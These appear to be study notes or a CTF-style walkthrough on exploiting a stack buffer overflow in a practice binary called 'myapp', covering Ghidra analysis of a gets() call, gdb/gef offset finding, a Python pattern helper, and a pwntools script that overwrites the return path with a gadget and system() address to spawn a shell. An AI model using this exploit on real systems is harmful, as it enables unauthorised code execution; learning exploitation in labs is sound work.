Binary exploitation

If you can download the app from the site, you can analyze it on Kali.

Tool: Ghidra

New Project > Non-Shared Project > set a project name > Tool Chest (dragon icon) > import the file.

And analyze!

  • look into functions > main and see what it's doing

local_128

gets(local_78)

puts(local_78)

  • The gets/puts pair is the problem: gets has no length limit, so a long line overflows local_78 and puts then echoes the buffer back.

Try to run the app

  • make it executable with chmod +x

  • gdb ./myapp

  • download gef

  • python -c 'print "A"*112' (Python 2 syntax; copy the output and paste it into the app's prompt to test for the BOF)

Does it make the app crash?

pattern create 200

run with "r" command

look at registers with "registers"

You can search for the pattern with

pattern search $rsp

create another pattern with

python -c 'print "A"*120 + "B"*8 + "C"*8'

to confirm exactly where the B bytes land.
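As an added illustration (not part of the original notes, and not gef's or pwntools' own code), this is what "pattern create" and "pattern search" do under the hood: the pattern is a de Bruijn sequence, so every 4-byte window occurs exactly once, and the bytes sitting in a register at the crash map back to a single offset. Assumptions: a lowercase alphabet with 4-byte unique windows (the same choice pwntools' cyclic() makes) and 64-bit little-endian registers; the crash value used at the bottom is constructed, not taken from a real run.

```python
import itertools
import string

# Added example (not from the original notes): a minimal reimplementation of
# gef's "pattern create" / "pattern search" so the offset found in the
# debugger can be reproduced and checked outside it. Assumptions: lowercase
# alphabet, 4-byte unique windows (like pwntools' cyclic()), 64-bit registers.


def de_bruijn_chars(alphabet, n):
    """Lazily yield the de Bruijn sequence B(k, n) over `alphabet` using the
    standard Lyndon-word construction; every n-character window is unique."""
    k = len(alphabet)
    a = [0] * (n + 1)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in range(1, p + 1):
                    yield alphabet[a[i]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def pattern_create(length, alphabet=string.ascii_lowercase, n=4):
    """Equivalent of `pattern create <length>`: the first `length` bytes of the
    cyclic pattern (4-byte windows stay unique up to 26**4 + 3 bytes)."""
    chars = itertools.islice(de_bruijn_chars(alphabet, n), length)
    return "".join(chars).encode()


def pattern_offset(pattern, value, n=4):
    """Equivalent of `pattern search <value>`: `value` is either the bytes seen
    in memory at the crash or a register's integer value (unpacked little-endian
    as on x86-64). Returns the offset of those bytes in the pattern, or -1."""
    if isinstance(value, int):
        value = value.to_bytes(8, "little")
    needle = value[:n]  # n unique bytes are enough to pin down the offset
    return pattern.find(needle)


def overflow_offset_from_crash(length, crash_value):
    """The two debugger steps chained: create the pattern that was sent, then
    look up where the value observed at the crash sits inside it."""
    return pattern_offset(pattern_create(length), crash_value)


if __name__ == "__main__":
    pat = pattern_create(200)
    print(pat.decode())
    # Constructed crash value: pretend $rsp pointed at pattern bytes 112..120.
    fake_rsp = int.from_bytes(pat[112:120], "little")
    print("offset:", pattern_offset(pat, fake_rsp))  # 112
```

Because the windows are unique, a 4-byte fragment is enough: if only the low half of a register holds pattern bytes, `pattern_offset` still resolves it, and an answer of -1 means the register's contents did not come from the input at all, so the crash is somewhere other than where you assumed.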

From Ghidra, copy the memory address of the main function.

create a simple exploit.py

from pwn import *

# Target binary and architecture (the addresses below come from this build of myapp)
context(os='linux', arch='amd64')
context(terminal=['tmux', 'new-window'])

# Launch the binary under gdb with a breakpoint on main
p = gdb.debug('./myapp', 'b main')

junk = b"A" * 112                 # fill local_78 up to the saved data
bin_sh = b"/bin/sh\x00"           # string that ends up on the stack
system = p64(0x40116e)            # put the system address here (see objdump below)
pop_r13 = p64(0x401206)           # pop r13 ; ret gadget
null = p64(0x0)
test = p64(0x401152)

p.recvuntil(b'What do you want me to echo back?')
p.sendline(junk + bin_sh + pop_r13 + system + null + null + test)
p.interactive()

Finding the system address:

objdump -D myapp | grep -i system
